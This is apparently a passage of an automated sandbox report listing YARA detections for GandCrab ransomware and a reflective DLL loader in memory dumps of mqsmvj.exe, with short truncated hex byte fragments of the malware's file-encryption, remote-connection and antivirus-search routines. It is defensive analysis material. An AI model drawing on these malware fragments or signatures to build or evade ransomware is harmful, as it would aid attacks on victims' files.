6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
14.3.mqsmvj.exe.32b0000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
14.3.mqsmvj.exe.32b0000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
14.3.mqsmvj.exe.32b0000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
14.3.mqsmvj.exe.32b0000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
14.3.mqsmvj.exe.32b0000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
14.3.mqsmvj.exe.32b0000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
37.3.mqsmvj.exe.3bc0000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
37.3.mqsmvj.exe.3bc0000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
37.3.mqsmvj.exe.3bc0000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
37.3.mqsmvj.exe.3bc0000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
37.3.mqsmvj.exe.3bc0000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
37.3.mqsmvj.exe.3bc0000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
35.3.mqsmvj.exe.3970000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
35.3.mqsmvj.exe.3970000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
35.3.mqsmvj.exe.3970000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
35.3.mqsmvj.exe.3970000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
35.3.mqsmvj.exe.3970000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
35.3.mqsmvj.exe.3970000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
23.3.mqsmvj.exe.3a70000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
23.3.mqsmvj.exe.3a70000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
23.3.mqsmvj.exe.3a70000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
23.3.mqsmvj.exe.3a70000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
23.3.mqsmvj.exe.3a70000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
23.3.mqsmvj.exe.3a70000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
35.2.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
35.2.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
35.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
35.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
35.2.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
35.2.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
35.2.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
19.0.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
19.0.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
19.0.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
19.0.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
19.0.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
19.0.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
28.3.mqsmvj.exe.3130000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
28.3.mqsmvj.exe.3130000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
28.3.mqsmvj.exe.3130000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
28.3.mqsmvj.exe.3130000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
28.3.mqsmvj.exe.3130000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
28.3.mqsmvj.exe.3130000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
12.3.mqsmvj.exe.2fb0000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
12.3.mqsmvj.exe.2fb0000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
12.3.mqsmvj.exe.2fb0000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
12.3.mqsmvj.exe.2fb0000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
12.3.mqsmvj.exe.2fb0000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
12.3.mqsmvj.exe.2fb0000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
19.3.mqsmvj.exe.3930000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
19.3.mqsmvj.exe.3930000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
19.3.mqsmvj.exe.3930000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
19.3.mqsmvj.exe.3930000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
19.3.mqsmvj.exe.3930000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
19.3.mqsmvj.exe.3930000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
39.3.mqsmvj.exe.2fb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
39.3.mqsmvj.exe.2fb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
39.3.mqsmvj.exe.2fb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
39.3.mqsmvj.exe.2fb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
39.3.mqsmvj.exe.2fb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
39.3.mqsmvj.exe.2fb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
11.3.mqsmvj.exe.3290000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
11.3.mqsmvj.exe.3290000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
11.3.mqsmvj.exe.3290000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
11.3.mqsmvj.exe.3290000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
11.3.mqsmvj.exe.3290000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
11.3.mqsmvj.exe.3290000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 